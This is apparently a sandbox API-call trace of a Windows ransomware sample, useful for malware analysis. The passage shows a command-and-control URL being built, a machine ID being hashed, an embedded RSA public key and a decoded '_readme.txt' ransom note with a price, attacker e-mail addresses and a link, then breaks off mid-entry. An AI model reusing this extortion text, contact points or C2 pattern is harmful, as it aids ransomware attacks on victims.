(in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323a180, cbMultiByte=-1, lpWideCharStr=0x31cbbd8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0040.830] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0040.830] lstrlenA (lpString="") returned 0 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2) returned 0x31cbc78 [0040.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323a3e8, cbMultiByte=-1, lpWideCharStr=0x31cbc78, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0040.831] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0040.831] lstrlenA (lpString="") returned 0 [0040.831] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2) returned 0x31cbc28 [0040.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323a650, cbMultiByte=-1, lpWideCharStr=0x31cbc28, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0040.831] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0040.831] lstrlenA (lpString="") returned 0 [0040.831] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2) returned 0x31cbc38 [0040.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323a8b8, cbMultiByte=-1, lpWideCharStr=0x31cbc38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0040.831] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0040.831] lstrlenA (lpString="") returned 0 [0040.831] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2) returned 0x31cbc98 [0040.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323ab20, cbMultiByte=-1, lpWideCharStr=0x31cbc98, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0040.831] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0040.831] lstrlenA (lpString="") returned 0 [0040.831] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2) returned 0x31cbc48 [0040.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323ad88, cbMultiByte=-1, lpWideCharStr=0x31cbc48, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0040.831] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0040.831] lstrlenA (lpString="") returned 0 [0040.831] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2) returned 0x31cbc58 [0040.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323aff0, cbMultiByte=-1, lpWideCharStr=0x31cbc58, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0040.831] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0040.831] lstrlenA (lpString="") returned 0 [0040.831] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2) returned 0x31cbc68 [0040.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323b258, cbMultiByte=-1, lpWideCharStr=0x31cbc68, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0040.831] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0040.832] lstrlenW (lpString="") returned 0 [0040.832] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x6aa450 [0040.832] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x288) returned 0x322c750 [0040.832] GetAdaptersInfo (in: AdapterInfo=0x322c750, SizePointer=0x18d834 | out: AdapterInfo=0x322c750, SizePointer=0x18d834) returned 0x0 [0040.893] GetAdaptersInfo (in: AdapterInfo=0x322c750, SizePointer=0x18d834 | out: AdapterInfo=0x322c750, SizePointer=0x18d834) returned 0x0 [0040.908] GetLastError () returned 0x0 [0040.913] GetLastError () returned 0x0 [0040.914] CryptAcquireContextW (in: phProv=0x18d804, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d804*=0x6b7fb0) returned 1 [0040.949] CryptCreateHash (in: hProv=0x6b7fb0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d80c | out: phHash=0x18d80c) returned 1 [0040.949] CryptHashData (hHash=0x323e320, pbData=0x322af58, dwDataLen=0x11, dwFlags=0x0) returned 1 [0040.949] CryptGetHashParam (in: hHash=0x323e320, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d808, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d808) returned 1 [0040.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3240c28 [0040.949] CryptGetHashParam (in: hHash=0x323e320, dwParam=0x2, pbData=0x3240c28, pdwDataLen=0x18d808, dwFlags=0x0 | out: pbData=0x3240c28, pdwDataLen=0x18d808) returned 1 [0040.949] GetLastError () returned 0x0 [0040.949] CryptDestroyHash (hHash=0x323e320) returned 1 [0040.949] CryptReleaseContext (hProv=0x6b7fb0, dwFlags=0x0) returned 1 [0040.949] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322af58 | out: hHeap=0x660000) returned 1 [0040.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257630 [0040.950] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575f8 | out: hHeap=0x660000) returned 1 [0040.950] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5d40 | out: hHeap=0x660000) returned 1 [0040.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x9dc) returned 0x5d4 [0041.168] WaitForSingleObject (hHandle=0x5d4, dwMilliseconds=0xffffffff) returned 0x0 [0042.095] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x3a4 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28) returned 0x324e6b8 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323b4c0 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323b728 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323b990 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323bbf8 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323be60 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323c0c8 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x32491b0 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3249418 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3249680 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x32498e8 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x3e0) returned 0x32682e8 [0042.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x5ed) returned 0x3271a00 [0042.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x3271a00, cbMultiByte=1517, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 494 [0042.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x5f0) returned 0x3271ff8 [0042.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3271a00 | out: hHeap=0x660000) returned 1 [0042.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32682e8 | out: hHeap=0x660000) returned 1 [0042.101] CryptAcquireContextW (in: phProv=0x18d874, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d874*=0x6b83f0) returned 1 [0042.173] CryptCreateHash (in: hProv=0x6b83f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d878 | out: phHash=0x18d878) returned 1 [0042.174] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0042.174] CryptHashData (hHash=0x327c840, pbData=0x3271ff8, dwDataLen=0x1ed, dwFlags=0x0) returned 1 [0042.174] CryptGetHashParam (in: hHash=0x327c840, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d87c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d87c) returned 1 [0042.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3241768 [0042.174] CryptGetHashParam (in: hHash=0x327c840, dwParam=0x2, pbData=0x3241768, pdwDataLen=0x18d87c, dwFlags=0x0 | out: pbData=0x3241768, pdwDataLen=0x18d87c) returned 1 [0042.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x34) returned 0x327c880 [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="", lpString2="E1" | out: lpString1="E1") returned="E1" [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="E1", lpString2="76" | out: lpString1="E176") returned="E176" [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="E176", lpString2="D9" | out: lpString1="E176D9") returned="E176D9" [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="E176D9", lpString2="3B" | out: lpString1="E176D93B") returned="E176D93B" [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="E176D93B", lpString2="C4" | out: lpString1="E176D93BC4") returned="E176D93BC4" [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="E176D93BC4", lpString2="5F" | out: lpString1="E176D93BC45F") returned="E176D93BC45F" [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="E176D93BC45F", lpString2="7A" | out: lpString1="E176D93BC45F7A") returned="E176D93BC45F7A" [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="E176D93BC45F7A", lpString2="CA" | out: lpString1="E176D93BC45F7ACA") returned="E176D93BC45F7ACA" [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="E176D93BC45F7ACA", lpString2="83" | out: lpString1="E176D93BC45F7ACA83") returned="E176D93BC45F7ACA83" [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="E176D93BC45F7ACA83", lpString2="C3" | out: lpString1="E176D93BC45F7ACA83C3") returned="E176D93BC45F7ACA83C3" [0042.174] GetLastError () returned 0x0 [0042.174] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3", lpString2="B7" | out: lpString1="E176D93BC45F7ACA83C3B7") returned="E176D93BC45F7ACA83C3B7" [0042.174] GetLastError () returned 0x0 [0042.175] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3B7", lpString2="95" | out: lpString1="E176D93BC45F7ACA83C3B795") returned="E176D93BC45F7ACA83C3B795" [0042.175] GetLastError () returned 0x0 [0042.175] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3B795", lpString2="05" | out: lpString1="E176D93BC45F7ACA83C3B79505") returned="E176D93BC45F7ACA83C3B79505" [0042.175] GetLastError () returned 0x0 [0042.175] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3B79505", lpString2="9E" | out: lpString1="E176D93BC45F7ACA83C3B795059E") returned="E176D93BC45F7ACA83C3B795059E" [0042.175] GetLastError () returned 0x0 [0042.175] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3B795059E", lpString2="89" | out: lpString1="E176D93BC45F7ACA83C3B795059E89") returned="E176D93BC45F7ACA83C3B795059E89" [0042.175] GetLastError () returned 0x0 [0042.175] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3B795059E89", lpString2="D3" | out: lpString1="E176D93BC45F7ACA83C3B795059E89D3") returned="E176D93BC45F7ACA83C3B795059E89D3" [0042.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3241768 | out: hHeap=0x660000) returned 1 [0042.175] CryptDestroyHash (hHash=0x327c840) returned 1 [0042.175] CryptReleaseContext (hProv=0x6b83f0, dwFlags=0x0) returned 1 [0042.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3271ff8 | out: hHeap=0x660000) returned 1 [0042.175] lstrlenA (lpString="E176D93BC45F7ACA83C3B795059E89D3") returned 32 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x3e0) returned 0x3271fe8 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x5ed) returned 0x3279450 [0042.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x3279450, cbMultiByte=1517, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 494 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x5f0) returned 0x32807e8 [0042.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3279450 | out: hHeap=0x660000) returned 1 [0042.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3271fe8 | out: hHeap=0x660000) returned 1 [0042.175] lstrcpyA (in: lpString1=0x3231598, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0042.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32807e8 | out: hHeap=0x660000) returned 1 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x742308 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28) returned 0x3258058 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324a020 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324a288 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324a4f0 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324a758 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324a9c0 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324ac28 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324ae90 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324b0f8 [0042.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324b360 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324b5c8 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x816) returned 0x32807e8 [0042.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d880, cbMultiByte=-1, lpWideCharStr=0x32807e8, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x3281008 [0042.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32807e8 | out: hHeap=0x660000) returned 1 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28) returned 0x32580b8 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324b830 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324ba98 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324bd00 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324bf68 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324c1d0 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324c438 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324c6a0 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324c908 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324cb70 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x324cdd8 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x32625e8 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3271fe8 [0042.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32625e8 | out: hHeap=0x660000) returned 1 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1d0) returned 0x3272120 [0042.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3271fe8 | out: hHeap=0x660000) returned 1 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b7) returned 0x32722f8 [0042.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3272120 | out: hHeap=0x660000) returned 1 [0042.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x412) returned 0x3279450 [0042.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32722f8 | out: hHeap=0x660000) returned 1 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x61a) returned 0x3281830 [0042.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3279450 | out: hHeap=0x660000) returned 1 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x440) returned 0x3271fe8 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x106a) returned 0x3281e58 [0042.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3271fe8, cbMultiByte=-1, lpWideCharStr=0x3281e58, cchWideChar=2101 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned 1078 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1070) returned 0x3282ed0 [0042.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3281e58 | out: hHeap=0x660000) returned 1 [0042.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3271fe8 | out: hHeap=0x660000) returned 1 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28) returned 0x32580e8 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327d800 [0042.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x327da68 [0042.177] 